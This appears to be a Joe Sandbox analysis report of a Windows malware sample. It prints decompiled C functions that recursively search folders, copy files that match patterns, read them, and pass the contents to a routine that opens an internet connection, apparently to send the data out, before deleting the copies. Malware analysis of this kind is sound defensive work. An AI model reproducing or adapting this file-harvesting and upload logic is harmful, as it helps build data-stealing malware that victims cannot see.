				CHAR* _t181;
				void* _t185;
				void* _t187;
				void* _t189;
				void* _t190;
				void* _t191;
				void* _t192;
				void* _t193;

				_t169 = __edx;
				wsprintfA( &_v828, "%s\\*", _a12);
				_t85 = FindFirstFileA( &_v828,  &_v1412); // executed
				_v12 = _t85;
				_v16 =  &_v300;
				memset(_v16, 0, 0x104 << 0);
				_t187 = _t185 + 0x18;
				if(_v12 == 0xffffffff) {
					L20:
					return E00401562( &_a36);
				}
				_v16 =  &_v300;
				do {
					memset(_v16, 0, 0x104 << 0);
					_t187 = _t187 + 0xc;
					 *0x61375c( &_v300,  &(_v1412.cFileName));
					_push(0x40fbf0);
					_push( &_v300);
					if( *0x613784() == 0) {
						goto L18;
					}
					_push(0x40fbf4);
					_push( &_v300);
					if( *0x613784() == 0) {
						goto L18;
					}
					_t181 = "%s\\%s";
					wsprintfA( &_v564, _t181, _a12,  &_v300);
					_v8 =  &_v2412;
					memset(_v8, 0, 0x3e8 << 0);
					_t189 = _t187 + 0x1c;
					_t163 = 0;
					_t154 = 0;
					if(_a32 != 0 && PathMatchSpecA( &_v300,  *0x613498) != 0) {
						 *0x61377c(0); // executed
						E0040A727( &_v564,  &_v2412); // executed
						 *0x613764(); // executed
						_v8 =  &_v564;
						memset(_v8, 0, 0x104 << 0);
						_t189 = _t189 + 0xc;
						 *0x61375c( &_v564,  &_v2412);
						_t153 =  *0x61367c( &_v300);
						_t163 =  &_v300;
						 *((char*)(_t153 +  &_v300 - 4)) = 0;
					}
					_t109 =  *0x613784(_a4, 0x40fbe1);
					_push( &_v300);
					if(_t109 != 0) {
						wsprintfA( &_v1092, _t181, _a4);
						_t187 = _t189 + 0x10;
					} else {
						_push(_a8);
						_push( *0x61343c);
						wsprintfA( &_v1092, "%s\\%s\\%s");
						_t187 = _t189 + 0x14;
					}
					_t114 = PathMatchSpecA( &_v564, _a16);
					_t201 = _t114;
					if(_t114 == 0) {
						L15:
						if(_a28 != _t154 && (_v1412.dwFileAttributes & 0x00000010) != 0) {
							_t190 = _t187 - 0x50;
							E00401581( &_a36, _t190);
							_push(_a32);
							_push(_a28);
							_push(_a24);
							_push(_a20);
							_push(_a16);
							_push( &_v564);
							_push(_a8);
							_push( &_v1092); // executed
							E0040A802(_t169); // executed
							_t187 = _t190 + 0x70;
						}
					} else {
						CopyFileA( &_v564,  &_v300, 1); // executed
						_t123 = E0040DC8F(_t163,  &_v300); // executed
						_pop(_t164);
						_a24 = _a24 + E0040EC10(_t123, _t169, 0x3e8, _t154);
						_t191 = _t187 - 0xc;
						E0040EA50(_t191, _t201,  &_v300);
						_t127 = E00404B20( &_v24,  &_v20); // executed
						_t187 = _t191 + 0xc;
						_t202 = _t127;
						if(_t127 != 0) {
							_push(_v20);
							_push(_v24);
							_t192 = _t187 - 0xc;
							E0040EA50(_t192, _t202,  &_v1092);
							_t193 = _t192 - 0x50;
							E00401581( &_a36, _t193);
							_push( &_v36); // executed
							E00403721(_t164, _t202); // executed
							_t187 = _t193 + 0x68;
							E004016EF(_v36);
						}
						DeleteFileA( &_v300); // executed
						if(_a24 > _a20) {
							break;
						} else {
							_t154 = 0;
							goto L15;
						}
					}
					L18:
					_t99 = FindNextFileA(_v12,  &_v1412); // executed
				} while (_t99 != 0);
				FindClose(_v12);
				goto L20;
			}

0x0040a802
0x0040a81d
0x0040a834
0x0040a83a
0x0040a843
0x0040a850
0x0040a850
0x0040a856
0x0040aad6
0x0040aae2
0x0040aae2
0x0040a862
0x0040a865
0x0040a86f
0x0040a86f
0x0040a87f
0x0040a885
0x0040a890
0x0040a899
0x00000000
0x00000000
0x0040a89f
0x0040a8aa
0x0040a8b3
0x00000000
0x00000000
0x0040a8c3
0x0040a8d0
0x0040a8df
0x0040a8ec
0x0040a8ec
0x0040a8ec
0x0040a8ee
0x0040a8f3
0x0040a90d
0x0040a921
0x0040a928
0x0040a934
0x0040a941
0x0040a941
0x0040a951
0x0040a95e
0x0040a964
0x0040a96a
0x0040a96a
0x0040a976
0x0040a984
0x0040a98b
0x0040a9ac
0x0040a9b2
0x0040a98d
0x0040a98d
0x0040a990
0x0040a99c
0x0040a9a2
0x0040a9a2
0x0040a9bf
0x0040a9c5
0x0040a9c7
0x0040aa72
0x0040aa75
0x0040aa80
0x0040aa88
0x0040aa8d
0x0040aa96
0x0040aa99
0x0040aa9c
0x0040aa9f
0x0040aaa2
0x0040aaa3
0x0040aaac
0x0040aaad
0x0040aab2
0x0040aab2
0x0040a9cd
0x0040a9dd
0x0040a9ea
0x0040a9ef
0x0040a9fd
0x0040aa00
0x0040aa0c
0x0040aa17
0x0040aa1c
0x0040aa1f
0x0040aa21
0x0040aa23
0x0040aa2c
0x0040aa2f
0x0040aa35
0x0040aa3a
0x0040aa42
0x0040aa4a
0x0040aa4b
0x0040aa53
0x0040aa56
0x0040aa56
0x0040aa62
0x0040aa6e
0x00000000
0x0040aa70
0x0040aa70
0x00000000
0x0040aa70
0x0040aa6e
0x0040aab5
0x0040aabf
0x0040aac5
0x0040aad0
0x00000000

APIs

wsprintfA.USER32 ref: 0040A81D
FindFirstFileA.KERNEL32(?,?), ref: 0040A834
lstrcat.KERNEL32(?,?), ref: 0040A87F
StrCmpCA.SHLWAPI(?,0040FBF0), ref: 0040A891
StrCmpCA.SHLWAPI(?,0040FBF4), ref: 0040A8AB
wsprintfA.USER32 ref: 0040A8D0
PathMatchSpecA.SHLWAPI(?), ref: 0040A902
CoInitialize.OLE32(00000000), ref: 0040A90D

Part of subcall function 0040A727: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0040A786
Part of subcall function 0040A727: lstrcpyn.KERNEL32(0040A926,?,00000104), ref: 0040A7F5

lstrcat.KERNEL32(?,?), ref: 0040A951
lstrlen.KERNEL32(?), ref: 0040A95E
StrCmpCA.SHLWAPI(000000FF,0040FBE1), ref: 0040A976
wsprintfA.USER32 ref: 0040A99C
wsprintfA.USER32 ref: 0040A9AC
PathMatchSpecA.SHLWAPI(?,0040AC01), ref: 0040A9BF
CopyFileA.KERNEL32(?,?,00000001), ref: 0040A9DD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040A9F8
DeleteFileA.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040AA62
FindNextFileA.KERNEL32(000000FF,?), ref: 0040AABF
FindClose.KERNEL32(000000FF), ref: 0040AAD0

Strings

%s\%s\%s, xrefs: 0040A996
%s\*, xrefs: 0040A817
%s\%s, xrefs: 0040A8C3, 0040A8CE, 0040A9AA

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: Filewsprintf$Find$MatchPathSpeclstrcat$ByteCharCloseCopyDeleteFirstInitializeMultiNextUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpynlstrlen
String ID: %s\%s$%s\%s\%s$%s\*
API String ID: 665452687-1426491737
Opcode ID: 7e8742deaed6b9645649a9db09d4fa2f351ff03dc6265e8e7ee9e0b2ab59caed
Instruction ID: 904860b4ca463d137a309d21e7148626dad64481aa73061d4d09c78a631cb59e
Opcode Fuzzy Hash: 7e8742deaed6b9645649a9db09d4fa2f351ff03dc6265e8e7ee9e0b2ab59caed
Instruction Fuzzy Hash: B7812CB190021DABCF10DFA0DD49ADE7BBDAB08314F0445A6E905B2290EB39DBA5CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040B4FA Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 157
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0040B515
FindFirstFileA.KERNEL32(?,?), ref: 0040B52C
StrCmpCA.SHLWAPI(?,0040FBF0), ref: 0040B54A
StrCmpCA.SHLWAPI(?,0040FBF4), ref: 0040B564
wsprintfA.USER32 ref: 0040B589
StrCmpCA.SHLWAPI(0040FBE1,0040FBE1), ref: 0040B59A
wsprintfA.USER32 ref: 0040B5B7
wsprintfA.USER32 ref: 0040B5C7
PathMatchSpecA.SHLWAPI(?,?), ref: 0040B5DA
lstrcat.KERNEL32(?), ref: 0040B60A
lstrcat.KERNEL32(?,0040FBE4), ref: 0040B61D
lstrcat.KERNEL32(?,?), ref: 0040B62D
lstrcat.KERNEL32(?,0040FBE4), ref: 0040B63B
lstrcat.KERNEL32(?,?), ref: 0040B64F
CopyFileA.KERNEL32(?,?,00000001), ref: 0040B665
DeleteFileA.KERNEL32(?), ref: 0040B6CD
FindNextFileA.KERNEL32(?,?), ref: 0040B706
FindClose.KERNEL32(?), ref: 0040B717

Strings

%s\*, xrefs: 0040B50F
%s\%s, xrefs: 0040B57C, 0040B587, 0040B5C5

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
String ID: %s\%s$%s\*
API String ID: 2178766154-2848263008
Opcode ID: 38758fd651391fc032dfe1ae85f2ed0351255e555234b6c2e0d84ad4a82fb2c9
Instruction ID: 92abc30d639dc0d15eacd288df1efb9498a1c854f5aeeddc9b2a55f4db1c535a
Opcode Fuzzy Hash: 38758fd651391fc032dfe1ae85f2ed0351255e555234b6c2e0d84ad4a82fb2c9
Instruction Fuzzy Hash: FD51FDB190012DABCF11EFA1DD49ADE7B7DFB04304F0445A6B909F2290EB359B598F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC23 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 132
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 28%

			E0040AC23(intOrPtr _a4, intOrPtr _a8, char _a12) {
				void* _v8;
				CHAR* _v12;
				void* _v16;
				char _v20;
				char _v32;
				char _v300;
				char _v564;
				char _v828;
				struct _WIN32_FIND_DATAA _v1148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t55;
				void* _t66;
				void* _t89;
				void* _t130;
				void* _t131;
				void* _t135;
				void* _t136;
				void* _t138;
				void* _t139;

				wsprintfA( &_v828, "%s\\%s", _a4, _a8);
				_t131 = _t130 + 0x10;
				_t55 = FindFirstFileA( &_v828,  &_v1148); // executed
				_v16 = _t55;
				if(_t55 == 0xffffffff) {
					L8:
					return E00401562( &_a12);
				} else {
					goto L1;
				}
				do {
					L1:
					_push(0x40fbf0);
					_push( &(_v1148.cFileName));
					if( *0x613784() != 0) {
						_t66 =  *0x613784( &(_v1148.cFileName), 0x40fbf4);
						_t142 = _t66;
						if(_t66 != 0) {
							_v8 =  &_v564;
							memset(_v8, 0, 0x104 << 0);
							_v8 =  &_v300;
							memset(_v8, 0, 0x104 << 0);
							 *0x61375c( &_v564,  *0x613454);
							 *0x61375c( &_v564,  *0x613340);
							 *0x61375c( &_v564,  &(_v1148.cFileName));
							 *0x61375c( &_v300, _a4);
							 *0x61375c( &_v300, 0x40fbe4);
							 *0x61375c( &(_v1148.cFileName));
							_t135 = _t131 + 0x18 - 0xc;
							E0040EA50(_t135, _t142,  &_v300);
							_t89 = E00404B20( &_v12,  &_v20,  &_v300);
							_t136 = _t135 + 0xc;
							_t143 = _t89;
							if(_t89 != 0) {
								_push(_v20);
								_push(_v12);
								_t138 = _t136 - 0xc;
								E0040EA50(_t138, _t143,  &_v564);
								_t139 = _t138 - 0x50;
								E00401581( &_a12, _t139);
								_push( &_v32);
								E00403721(0, _t143);
								_t136 = _t139 + 0x68;
								E004016EF(_v32);
							}
							_v8 =  &_v564;
							memset(_v8, 0, 0x104 << 0);
							_v8 =  &_v300;
							memset(_v8, 0, 0x104 << 0);
							_t131 = _t136 + 0x18;
						}
					}
				} while (FindNextFileA(_v16,  &_v1148) != 0);
				FindClose(_v16);
				_v12 =  &_v828;
				memset(_v12, 0, 0x104 << 0);
				goto L8;
			}

0x0040ac41
0x0040ac47
0x0040ac58
0x0040ac5e
0x0040ac64
0x0040adf3
0x0040adff
0x00000000
0x00000000
0x00000000
0x0040ac6a
0x0040ac6a
0x0040ac6a
0x0040ac75
0x0040ac7e
0x0040ac90
0x0040ac96
0x0040ac98
0x0040aca4
0x0040acb1
0x0040acb9
0x0040acc6
0x0040acd5
0x0040ace8
0x0040acfc
0x0040ad0c
0x0040ad1e
0x0040ad32
0x0040ad38
0x0040ad44
0x0040ad4f
0x0040ad54
0x0040ad57
0x0040ad59
0x0040ad5b
0x0040ad64
0x0040ad67
0x0040ad6d
0x0040ad72
0x0040ad7a
0x0040ad82
0x0040ad83
0x0040ad8b
0x0040ad8e
0x0040ad8e
0x0040ad99
0x0040ada6
0x0040adae
0x0040adbb
0x0040adbb
0x0040adbb
0x0040ac98
0x0040adcd
0x0040add8
0x0040ade4
0x0040adf1
0x00000000

APIs

wsprintfA.USER32 ref: 0040AC41
FindFirstFileA.KERNEL32(?,?), ref: 0040AC58
StrCmpCA.SHLWAPI(?,0040FBF0), ref: 0040AC76
StrCmpCA.SHLWAPI(?,0040FBF4), ref: 0040AC90
lstrcat.KERNEL32(?), ref: 0040ACD5
lstrcat.KERNEL32(?), ref: 0040ACE8
lstrcat.KERNEL32(?,?), ref: 0040ACFC
lstrcat.KERNEL32(?,0040AECF), ref: 0040AD0C
lstrcat.KERNEL32(?,0040FBE4), ref: 0040AD1E
lstrcat.KERNEL32(?,?), ref: 0040AD32

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 00404B20: CreateFileA.KERNEL32(h|@,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,00407C68,?), ref: 00404B3B
Part of subcall function 00404B20: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00407C68,?), ref: 00404B52
Part of subcall function 00404B20: LocalAlloc.KERNEL32(00000040,?,?,?,?,00407C68,?), ref: 00404B69
Part of subcall function 00404B20: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,00407C68,?), ref: 00404B80
Part of subcall function 00404B20: FindCloseChangeNotification.KERNEL32(?,?,?,?,00407C68,?), ref: 00404BA8

Part of subcall function 00403721: lstrlen.KERNEL32(?), ref: 0040377A
Part of subcall function 00403721: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004037C9
Part of subcall function 00403721: StrCmpCA.SHLWAPI(?), ref: 004037DE

FindNextFileA.KERNEL32(?,?), ref: 0040ADC7
FindClose.KERNEL32(?), ref: 0040ADD8

Strings

%s\%s, xrefs: 0040AC3B

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$Close$AllocChangeCreateFirstInternetLocalNextNotificationOpenReadSizelstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 1635275004-4073750446
Opcode ID: 63a53ecc820c23fc197ff2c95c15302dcbc855763c409970ba320ef1efd1815b
Instruction ID: 266914ba7a9914a0ba73fa375279d9a04607026075726dc5f941e22ea02eedcc
Opcode Fuzzy Hash: 63a53ecc820c23fc197ff2c95c15302dcbc855763c409970ba320ef1efd1815b
Instruction Fuzzy Hash: 33510BB190021DABCF50DBA4DC88ACE7BBDEB08311F1444A6E605E3290EB34DB598F54

Uniqueness

Uniqueness Score: -1.00%

Function 00406218 Relevance: 18.4, APIs: 12, Instructions: 378
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00406218(void* __ecx, void* __eflags, char _a4, char _a16, char _a28, intOrPtr _a40, intOrPtr _a44, int _a48, int _a52, char _a56) {
				CHAR* _v12;
				CHAR* _v20;
				signed int _v24;
				CHAR* _v32;
				CHAR* _v36;
				void* _v44;
				void* _v48;
				CHAR* _v60;
				char _v72;
				char _v84;
				char _v96;
				char _v108;
				char _v120;
				char _v132;
				char _v144;
				char _v156;
				char _v168;
				char _v180;
				char _v192;
				char _v204;
				char _v216;
				char _v228;
				struct _WIN32_FIND_DATAA _v552;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t151;
				int _t168;
				void* _t171;
				intOrPtr _t197;
				void* _t200;
				int _t205;
				void* _t236;
				CHAR** _t271;
				void* _t300;
				void* _t308;
				void* _t370;
				void* _t371;
				void* _t372;
				void* _t373;
				void* _t374;
				void* _t375;
				void* _t376;
				void* _t377;
				void* _t378;
				void* _t379;
				void* _t380;
				void* _t381;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				void* _t390;
				void* _t391;
				void* _t392;
				void* _t393;
				void* _t394;
				void* _t395;
				void* _t396;

				_t397 = __eflags;
				_t308 = __ecx;
				_t300 = 0x40fbe1;
				E0040EA50( &_v60, __eflags, 0x40fbe1);
				E0040EAEF(E0040EB6B(E0040EB29( &_v60, _t308,  &_a16,  &_v32, __eflags), _t308,  &_v44, __eflags, "\\*"), _t308,  &_v60);
				E004016EF(_v44);
				E004016EF(_v32);
				E0040EA50( &_v20, _t397, 0x40fbe1);
				E0040EA50( &_v44, _t397, 0x40fbe1);
				_t151 = FindFirstFileA(_v60,  &_v552); // executed
				_v48 = _t151;
				if(_t151 == 0xffffffff) {
					L27:
					E004016EF(_v44);
					E004016EF(_v20);
					E004016EF(_v60);
					E004016EF(_a4);
					E004016EF(_a16);
					E004016EF(_a28);
					return E00401562( &_a56);
				} else {
					goto L1;
				}
				do {
					L1:
					_push(0x40fbf0);
					_push( &(_v552.cFileName));
					if( *0x613784() == 0) {
						goto L25;
					}
					_t171 =  *0x613784( &(_v552.cFileName), 0x40fbf4);
					_t400 = _t171;
					if(_t171 == 0) {
						goto L25;
					}
					E0040EAAB(_t308,  &_v20, _t300);
					E0040EAEF(E0040EB6B(E0040EB6B(E0040EB29( &_v20, _t308,  &_a16,  &_v108, _t400), _t308,  &_v204, _t400, 0x40fbe4), _t308,  &_v132, _t400,  &(_v552.cFileName)), _t308,  &_v20);
					E004016EF(_v132);
					E004016EF(_v204);
					E004016EF(_v108);
					_push( *0x613030);
					_push(0x40fbe4);
					_push( *0x613458);
					_push(0x40fbe4);
					_t401 = _a48;
					if(_a48 == 0) {
						E0040EAEF(E0040EB6B(E0040EB6B(E0040EB6B(E0040EB6B( &_v20, _t308,  &_v144, __eflags), _t308,  &_v120, __eflags), _t308,  &_v96, __eflags), _t308,  &_v84, __eflags), _t308,  &_v44);
						E004016EF(_v84);
						E004016EF(_v96);
						E004016EF(_v120);
						_t197 = _v144;
					} else {
						E0040EAEF(E0040EB6B(E0040EB6B(E0040EB6B(E0040EB6B( &_a16, _t308,  &_v156, _t401), _t308,  &_v228, _t401), _t308,  &_v72, _t401), _t308,  &_v180, _t401), _t308,  &_v44);
						E004016EF(_v180);
						E004016EF(_v72);
						E004016EF(_v228);
						_t197 = _v156;
					}
					E004016EF(_t197);
					_t200 =  *0x613784( &(_v552.cFileName),  *0x6133b8);
					_t402 = _t200;
					if(_t200 != 0) {
						__eflags =  *0x613784( &(_v552.cFileName),  *0x613030);
						if(__eflags != 0) {
							_t371 = _t370 - 0xc;
							E0040EA82( &_v44, _t308, _t371, __eflags); // executed
							_t205 = E0040D910(); // executed
							_t370 = _t371 + 0xc;
							__eflags = _t205;
							if(_t205 == 0) {
								__eflags =  *0x613784( &(_v552.cFileName),  *0x6133fc);
								if(__eflags != 0) {
									__eflags =  *0x613784( &(_v552.cFileName),  *0x61326c);
									if(__eflags == 0) {
										_push(_a48);
										_t383 = _t370 - 0x50;
										E00401581( &_a56, _t383);
										_t384 = _t383 - 0xc;
										E0040EA82( &_a28, _t308, _t384, __eflags);
										_t385 = _t384 - 0xc;
										E0040EA82( &_a4, _t308, _t385, __eflags);
										_t386 = _t385 - 0xc;
										E0040EA82( &_v20, _t308, _t386, __eflags); // executed
										E00405B46(_t308, __eflags); // executed
										_t370 = _t386 + 0x78;
									}
								} else {
									E0040EA50( &_v32, __eflags, 0x40fbe1);
									E0040EAEF(E0040EB6B( &_v32, _t308,  &_v168, __eflags,  *0x6133e4), _t308,  &_v32);
									E004016EF(_v168);
									_t236 = E0040D800(0x40fbe4,  &_v216, __eflags, 8);
									_pop(_t308);
									E0040EAEF(E0040EB29( &_v32, _t308, _t236,  &_v192, __eflags), _t308,  &_v32);
									E004016EF(_v192);
									E004016EF(_v216);
									CopyFileA(_v20, _v32, 1); // executed
									_push(_a48);
									_t387 = _t370 - 0x50;
									E00401581( &_a56, _t387);
									_t388 = _t387 - 0xc;
									E0040EA82( &_a28, _t308, _t388, __eflags);
									_t389 = _t388 - 0xc;
									E0040EA82( &_a4, _t308, _t389, __eflags);
									_t390 = _t389 - 0xc;
									E0040EA82( &_v32, _t308, _t390, __eflags); // executed
									E004058B3(_t308, __eflags); // executed
									_t391 = _t390 + 0x28;
									E00401581( &_a56, _t391);
									_push(_a48);
									_push(_a44);
									_push(_a40);
									_t392 = _t391 - 0xc;
									E0040EA82( &_a28, _t308, _t392, __eflags);
									_t393 = _t392 - 0xc;
									E0040EA82( &_a4, _t308, _t393, __eflags);
									_t394 = _t393 - 0xc;
									E0040EA82( &_v32, _t308, _t394, __eflags); // executed
									E00405D77(_t308, __eflags); // executed
									_t370 = _t394 + 0x80;
									DeleteFileA(_v32); // executed
									E004016EF(_v32);
									_v32 = _v32 & 0x00000000;
									_v24 = _v24 & 0x00000000;
									E004016EF(0);
								}
								goto L22;
							}
							__eflags = _a48;
							if(__eflags == 0) {
								_t395 = _t370 - 0x50;
								E00401581( &_a56, _t395);
								_push(0);
								L16:
								_push(_a44);
								_push(_a40);
								_t396 = _t395 - 0xc;
								E0040EA82( &_a28, _t308, _t396, __eflags);
								_t378 = _t396 - 0xc;
								E0040EA50(_t378, __eflags,  &(_v552.cFileName));
								_t271 =  &_v44;
								L17:
								_t379 = _t378 - 0xc;
								E0040EA82(_t271, _t308, _t379, __eflags); // executed
								E00405404(_t308, __eflags); // executed
								_t370 = _t379 + 0x80;
								goto L22;
							}
							__eflags = _a52;
							if(__eflags != 0) {
								goto L22;
							}
							_t395 = _t370 - 0x50;
							_a52 = 1;
							E00401581( &_a56, _t395);
							_push(_a48);
							goto L16;
						}
						__eflags =  *0x613784(_a4,  *0x613458);
						if(__eflags == 0) {
							goto L22;
						}
						_t376 = _t370 - 0x50;
						E00401581( &_a56, _t376);
						_push(_a48);
						_push(_a44);
						_push(_a40);
						_t377 = _t376 - 0xc;
						E0040EA82( &_a28, _t308, _t377, __eflags);
						_t378 = _t377 - 0xc;
						E0040EA82( &_a4, _t308, _t378, __eflags);
						_t271 =  &_v20;
						goto L17;
					} else {
						_push(_a44);
						_push(_a40);
						_t380 = _t370 - 0xc;
						E0040EA82( &_a28, _t308, _t380, _t402);
						_t381 = _t380 - 0xc;
						E0040EA82( &_v20, _t308, _t381, _t402);
						_t382 = _t381 - 0xc;
						E0040EA82( &_a4, _t308, _t382, _t402); // executed
						E0040501F(_t308, _t402); // executed
						_t370 = _t382 + 0x2c;
						L22:
						_t403 = _v552.dwFileAttributes & 0x00000010;
						if((_v552.dwFileAttributes & 0x00000010) != 0) {
							_t372 = _t370 - 0x50;
							E00401581( &_a56, _t372);
							_push(_a52);
							_push(_a48);
							_push(_a44);
							_push(_a40);
							_t373 = _t372 - 0xc;
							E0040EA82( &_a28, _t308, _t373, _t403);
							_t374 = _t373 - 0xc;
							E0040EA82( &_v20, _t308, _t374, _t403);
							_t375 = _t374 - 0xc;
							E0040EA50(_t375, _t403,  &(_v552.cFileName)); // executed
							E00406218(_t308, _t403); // executed
							_t370 = _t375 + 0x84;
						}
						E004016EF(_v20);
						_v20 = 0;
						_v12 = 0;
						E004016EF(_v44);
						_v44 = 0;
						_v36 = 0;
						_t300 = 0x40fbe1;
					}
					L25:
					_t168 = FindNextFileA(_v48,  &_v552); // executed
				} while (_t168 != 0);
				FindClose(_v48); // executed
				goto L27;
			}

0x00406218
0x00406218
0x00406224
0x0040622d
0x00406250
0x00406258
0x00406260
0x00406269
0x00406272
0x00406281
0x00406287
0x0040628d
0x00406753
0x00406756
0x0040675e
0x00406766
0x0040676e
0x00406776
0x0040677e
0x0040678f
0x00000000
0x00000000
0x00000000
0x00406293
0x00406293
0x00406293
0x0040629e
0x004062a7
0x00000000
0x00000000
0x004062b9
0x004062bf
0x004062c1
0x00000000
0x00000000
0x004062cb
0x00406301
0x00406309
0x00406314
0x0040631c
0x00406321
0x00406329
0x0040632a
0x00406330
0x00406331
0x00406334
0x004063b9
0x004063c1
0x004063c9
0x004063d1
0x004063d6
0x00406336
0x00406365
0x00406370
0x00406378
0x00406383
0x00406388
0x00406388
0x004063dc
0x004063ee
0x004063f4
0x004063f6
0x00406445
0x00406447
0x00406495
0x0040649d
0x004064a2
0x004064a7
0x004064aa
0x004064ac
0x00406538
0x0040653a
0x00406674
0x00406676
0x00406678
0x0040667e
0x00406683
0x00406688
0x00406690
0x00406695
0x0040669d
0x004066a2
0x004066aa
0x004066af
0x004066b4
0x004066b4
0x00406540
0x00406548
0x00406564
0x0040656f
0x0040657c
0x00406583
0x00406595
0x004065a0
0x004065ab
0x004065b8
0x004065be
0x004065c4
0x004065c9
0x004065ce
0x004065d6
0x004065db
0x004065e3
0x004065e8
0x004065f0
0x004065f5
0x004065fa
0x004065ff
0x00406604
0x0040660a
0x0040660d
0x00406610
0x00406615
0x0040661a
0x00406622
0x00406627
0x0040662f
0x00406634
0x00406639
0x00406642
0x0040664b
0x00406650
0x00406654
0x0040665a
0x0040665a
0x00000000
0x0040653a
0x004064ae
0x004064b1
0x004064d5
0x004064dd
0x004064e2
0x004064e4
0x004064e4
0x004064ea
0x004064ed
0x004064f2
0x004064f7
0x00406503
0x00406508
0x0040650b
0x0040650b
0x00406510
0x00406515
0x0040651a
0x00000000
0x0040651a
0x004064b3
0x004064b6
0x00000000
0x00000000
0x004064bc
0x004064c4
0x004064cb
0x004064d0
0x00000000
0x004064d0
0x00406458
0x0040645a
0x00000000
0x00000000
0x00406460
0x00406468
0x0040646d
0x00406473
0x00406476
0x00406479
0x0040647e
0x00406483
0x0040648b
0x00406490
0x00000000
0x004063f8
0x004063f8
0x004063fe
0x00406401
0x00406406
0x0040640b
0x00406413
0x00406418
0x00406420
0x00406425
0x0040642a
0x004066b7
0x004066b7
0x004066be
0x004066c0
0x004066c8
0x004066cd
0x004066d3
0x004066d6
0x004066d9
0x004066dc
0x004066e1
0x004066e6
0x004066ee
0x004066f3
0x004066ff
0x00406704
0x00406709
0x00406709
0x00406712
0x0040671c
0x0040671f
0x00406722
0x00406727
0x0040672a
0x0040672d
0x0040672d
0x00406732
0x0040673c
0x00406742
0x0040674d
0x00000000

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 0040EB29: lstrcpy.KERNEL32(00000000,?), ref: 0040EB57
Part of subcall function 0040EB29: lstrcat.KERNEL32(?,00000000), ref: 0040EB61

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

